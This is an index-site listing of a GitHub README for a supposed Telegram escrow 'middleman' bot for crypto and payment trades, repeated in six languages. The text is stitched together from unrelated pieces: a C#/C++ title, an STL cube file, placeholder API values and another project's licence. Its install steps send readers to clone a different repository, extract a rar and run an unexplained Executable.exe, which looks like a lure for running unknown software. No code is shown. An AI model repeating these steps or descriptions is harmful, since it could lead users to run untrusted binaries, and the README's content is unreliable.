An open API service indexing awesome lists of open source software.

https://github.com/hangthed64/zox-telegram-middleman-services-bot-transaction

This repository provides a comprehensive solution for Telegram middleman services. The Zox bot facilitates secure transactions, ensuring smooth and reliable exchanges between parties. Enhance your Telegram transactions with this efficient middleman bot.
https://github.com/hangthed64/zox-telegram-middleman-services-bot-transaction

cryptocurrencies cryptocurrency middleman middleman-cashapp middleman-crypto middleman-paypal middleman-service middleman-telegram telegram telegram-bot telegram-bot-api telegram-bot-app telegram-bot-example telegram-channel telegram-userbot

Last synced: 3 months ago
JSON representation

This repository provides a comprehensive solution for Telegram middleman services. The Zox bot facilitates secure transactions, ensuring smooth and reliable exchanges between parties. Enhance your Telegram transactions with this efficient middleman bot.

Awesome Lists containing this project

README

        

## EN

















Building System Applications with C# & C++ 🚀

## README LANGUAGE


LANGUAGES!



ENGLISH
ARABIC
CHINESE
FRENCH
PORTUGuESE
TURKISH



---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Read About
A Telegram Middleman Bot facilitates secure transactions between two parties within the Telegram messaging platform. Acting as an intermediary, the bot ensures that both parties fulfill their obligations before transferring assets or completing the transaction. This enhances trust and security, especially in peer-to-peer transactions, by providing escrow services and dispute resolution mechanisms. The Middleman Bot streamlines the process, making transactions convenient and transparent for Telegram users.

#### **Please ReaD First What You Need Part.**
####

(WHAT YOU NEED)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(back to top)

## Roadmap

- [ ] New Gui
- [x] Add back to top links
- [ ] Add Additional Templates w/ Examples
- [ ] New Features
- [x] Multi-language Support
- [x] Chinese
- [x] Turkish
- [x] French
- [x] Spanish

(back to top)

## Getting Started

### Prerequisites

This is an example of how to list things you need to use the software and how to install them.
* npm
```sh
npm install npm@latest -g
```

### Installation

1. Download Visual Studio 2022
_using Git Clone Or either download the project or exit the rar. Then Download Visual Studio 2022 Here Link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Download These

2. Clone the repo
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Then open the sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Find Executable File
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(back to top)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(back to top)

## Contributing











(back to top)


Preview

Not sure where to start? Join our discord and we will help you get started!

(back to top)


snake

## AR

















بناء تطبيقات النظام باستخدام C# وC++ 🚀

## اللغة التمهيدية


اللغات!



إنجليزي
ARABIC
صينى
فرنسي
البرتغالية
اللغة التركية


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## أقرأ عن
يقوم Telegram Middleman Bot بتسهيل المعاملات الآمنة بين طرفين داخل منصة المراسلة Telegram. يعمل الروبوت كوسيط، ويضمن قيام الطرفين بالوفاء بالتزاماتهما قبل نقل الأصول أو إتمام المعاملة. وهذا يعزز الثقة والأمن، وخاصة في المعاملات بين نظير إلى نظير، من خلال توفير خدمات الضمان وآليات حل النزاعات. يعمل برنامج Middleman Bot على تبسيط العملية، مما يجعل المعاملات مريحة وشفافة لمستخدمي Telegram.

#### **يرجى قراءة الجزء الأول الذي تحتاجه.**
####

(ماذا تحتاج)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(العودة إلى الأعلى)

## خريطة الطريق

- [ ] جديد Gui
- [x] أضف العودة إلى الروابط العليا
- [ ] أضف قوالب إضافية مع أمثلة
- [ ] جديد سمات
- [x] دعم متعدد اللغات
- [x] صينى
- [x] اللغة التركية
- [x] فرنسي
- [x] الأسبانية

(العودة إلى الأعلى)

## ابدء

### المتطلبات الأساسية

هذا مثال لكيفية إدراج الأشياء التي تحتاجها لاستخدام البرنامج وكيفية تثبيتها.
* npm
```sh
npm install npm@latest -g
```

### تثبيت

1. تحميل Visual Studio 2022
_باستخدام Git Clone أو إما تنزيل المشروع أو الخروج من ملف rar. ثم قم بتنزيل Visual Studio 2022 هنا الرابط [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> قم بتنزيل هذه

2. استنساخ الريبو
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. أو

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _ثم افتح sln (Project Solution) ملف_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. ابحث عن الملف القابل للتنفيذ
```sh
/ProjectName/Bin/Debug/قابل للتنفيذ (. EXE
```

(العودة إلى الأعلى)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(العودة إلى الأعلى)

## المساهمة











(العودة إلى الأعلى)


Preview

لست متأكدا من أين تبدأ؟ انضم إلى خلافنا وسنساعدك على البدء!

(العودة إلى الأعلى)


snake

## License

جزء كبير من هذا المشروع مرخص بموجب [Apache 2.0](./LICENSE) license. الاستثناء الوحيد هو المكونات الموجودة تحت `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## CH

















使用 C# 和 C++ 构建系统应用程序 🚀

## 自述文件语言


语言!



英语
阿拉伯
CHINESE
法语
葡萄牙语
土耳其


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## 阅读
Telegram 中间人机器人促进 Telegram 消息平台内两方之间的安全交易。作为中介,机器人确保双方在转移资产或完成交易之前履行其义务。通过提供托管服务和争议解决机制,这增强了信任和安全性,尤其是在点对点交易中。 Middleman Bot 简化了流程,使 Telegram 用户的交易变得方便且透明。

#### **请先阅读您需要的部分。**
####

(您需要什么)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(回到顶部)

## 路线图

- [ ] 新的 Gui
- [x] 添加返回顶部链接
- [ ] 添加附加模板和示例
- [ ] 新的 特征
- [x] 多语言支持
- [x] 中国人
- [x] 土耳其
- [x] 法语
- [x] 西班牙语

(回到顶部)

## 入门

### 先决条件

这是如何列出使用该软件所需的东西以及如何安装它们的示例。
* npm
```sh
npm install npm@latest -g
```

### 安装

1. 下载 Visual Studio 2022
_使用 Git Clone 或者下载项目或退出 rar。然后在此处下载 Visual Studio 2022 链接 [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> 下载这些

2. 克隆存储库
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _然后打开sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. 查找可执行文件
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(回到顶部)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(回到顶部)

## 贡献











(回到顶部)


Preview

不知道从哪里开始?加入我们的discord,我们将帮助您开始!

(回到顶部)


snake

## 执照

该项目的很大一部分是根据 [Apache 2.0](./LICENSE) 执照。唯一的例外是下面的组件 `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## FR

















Création d'applications système avec C# et C++ 🚀

## LANGUE README


LANGAGES!



ANGLAIS
ARABE
CHINOIS
FRANÇAIS
Portugais
TURC


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Lire à propos
Un Telegram Middleman Bot facilite les transactions sécurisées entre deux parties au sein de la plateforme de messagerie Telegram. Agissant en tant qu'intermédiaire, le bot s'assure que les deux parties remplissent leurs obligations avant de transférer des actifs ou de finaliser la transaction. Cela améliore la confiance et la sécurité, en particulier dans les transactions peer-to-peer, en fournissant des services de dépôt fiduciaire et des mécanismes de résolution des litiges. Le Middleman Bot rationalise le processus, rendant les transactions pratiques et transparentes pour les utilisateurs de Telegram.

#### **Veuillez lire d'abord la pièce dont vous avez besoin.**
####

(DE QUOI AS-TU BESOIN)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```

### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(retour au sommet)

## Feuille de Route

- [ ] Nouvelle Gui
- [x] Ajouter des liens vers le haut
- [ ] Ajouter Des Modèles Supplémentaires avec des Exemples
- [ ] Nouvelles Fonctionnalités
- [x] Prise en charge multilingue
- [x] Chinois
- [x] Turc
- [x] Français
- [x] Espagnol

(retour au sommet)

## Pour Commencer

### Prérequis

Ceci est un exemple de la façon de répertorier les éléments dont vous avez besoin pour utiliser le logiciel et de les installer.
* npm
```sh
npm install npm@latest -g
```

### Montage

1. Télécharger Visual Studio 2022
_en utilisant Git Clone Ou téléchargez le projet ou quittez le rar. Ensuite, Téléchargez Visual Studio 2022 Ici Lien [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Téléchargez-Les

2. Cloner le dépôt
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OU

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Ensuite, ouvrez le sln (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Trouver un Fichier Exécutable
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(retour au sommet)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(retour au sommet)

## Contribuant











(retour au sommet)


Preview

Vous ne savez pas par où commencer? Rejoignez notre discorde et nous vous aiderons à démarrer!

(retour au sommet)


snake

## Licence

A large part of this project is licensed under the [Apache 2.0](./LICENSE) license. The only exception are the components under the `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## PR

















Construindo aplicativos de sistema com C# e C++ 🚀

## IDIOMA LEIA-ME


LÍNGUAS!



INGLÊS
ÁRABE
CHINÊS
FRANCÊS
Português
TURCO


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Ler sobre
Um Telegram Middleman Bot facilita transações seguras entre duas partes na plataforma de mensagens Telegram. Atuando como intermediário, o bot garante que ambas as partes cumpram as suas obrigações antes de transferir ativos ou concluir a transação. Isto aumenta a confiança e a segurança, especialmente em transações entre pares, através da prestação de serviços de garantia e de mecanismos de resolução de litígios. O Middleman Bot agiliza o processo, tornando as transações convenientes e transparentes para os usuários do Telegram.

#### **Por favor, leia primeiro o que você precisa.**
####

(O QUE VOCÊ PRECISA)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(de volta ao topo)

## Roadmap

- [ ] Novo Gui
- [x] Adicionar links de volta ao topo
- [ ] Adicione modelos adicionais com exemplos
- [ ] Novo Features
- [x] Suporte multilíngue
- [x] chinês
- [x] Turco
- [x] Francês
- [x] Espanhol

(de volta ao topo)

## Começando

### Pré-requisitos

Este é um exemplo de como listar os itens necessários para usar o software e como instalá-los.
* npm
```sh
npm install npm@latest -g
```

### Instalação

1. Download Visual Studio 2022
_usando Git Clone Ou baixe o projeto ou saia do rar. Então baixe o Visual Studio 2022 aqui link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Baixe estes

2. Clonar o repositório
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Então abra o sln (Project Solution) arquivo_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Encontre o arquivo executável
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(de volta ao topo)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(de volta ao topo)

## Contribuindo











(de volta ao topo)


Preview

Não sabe por onde começar? Junte-se ao nosso discord e nós o ajudaremos a começar!

(de volta ao topo)


snake

## Licença

Grande parte deste projeto está licenciada sob o [Apache 2.0](./LICENSE) license. A única exceção são os componentes sob o `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.

## TR

















C# ve C++ ile Sistem Uygulamaları Oluşturuyorum. 🚀

## README Dil


DİLLER!



İNGİLİZCE
ARAPÇA
ÇİNCE
FRANSIZCA
Portekizce
TÜRKÇE


---------------------------------


Hi, I'm Mathieu 👋 I'm a 🚀 French developer 🚀 I ❤️ Happy Hardcore ❤️

## Hakkında oku
Telegram Aracı Botu, Telegram mesajlaşma platformunda iki taraf arasındaki güvenli işlemleri kolaylaştırır. Aracı görevi gören bot, varlıkları aktarmadan veya işlemi tamamlamadan önce her iki tarafın da yükümlülüklerini yerine getirmesini sağlar. Bu, emanet hizmetleri ve anlaşmazlık çözüm mekanizmaları sağlayarak, özellikle eşler arası işlemlerde güveni ve güvenliği artırır. Middleman Bot, süreci kolaylaştırarak işlemleri Telegram kullanıcıları için kolay ve şeffaf hale getiriyor.

#### **Lütfen Önce Neye İhtiyacınız Var Kısmını Okuyun.**
####

(NEYE İHTİYACIN VAR)

![vtest](https://github.com/df123hh/photo/assets/171132664/bd59eed4-3e99-45b1-a283-f6378a913daa)

https://github.com/df123hh/photo/assets/171132664/b76f9ac6-f0dd-4db5-b600-8405d2ca4679

```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### NE GEREKİYOR.
----

| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |

----

(Başa Dönüş)

## Yol Haritası(HEDEFLER)

- [ ] Yeni Gui
- [x] Başa dön bağlantılarına ekle
- [ ] Örneklerle Ek Şablonlar Ekleme
- [ ] Yeni özellikler
- [x] Çoklu Dil Desteği
- [x] Çince
- [x] Türkçe
- [x] Fransızca
- [x] İspanyol

(Başa Dönüş)

## Öncelikle

### Önkoşullar

Bu, yazılımı kullanmak için ihtiyaç duyduğunuz şeylerin nasıl listeleneceğine ve bunların nasıl kurulacağına ilişkin bir örnektir.
* npm
```sh
npm install npm@latest -g
```

### Kurulum

1. Download Visual Studio 2022
_Git Clone'u kullanarak Veya projeyi indirin veya rar'dan çıkın. Ardından Visual Studio 2022'yi Buradan İndirin Bağlantı [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Bunları İndir

2. Depoyu klonla
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. Veya

![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)

4. _Daha sonra Sln Dosyasini Acin (Project Solution) file_

![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

5. Yürütülebilir Dosyayı Bul
```sh
/ProjectName/Bin/Debug/Executable.exe
```

(Başa Dönüş)

```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```

(Başa Dönüş)

## Katkı











(Başa Dönüş)


Preview

Nereden başlayacağınızdan emin değil misiniz? Discordumuza katılın ve başlamanıza yardımcı olalım!

(Başa Dönüş)


snake

## Lisans

Bu projenin büyük bir kısmı lisanslıdır. [Apache 2.0](./LICENSE) lisans. Bunun tek istisnası, aşağıdakiler kapsamındaki bileşenlerdir: `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.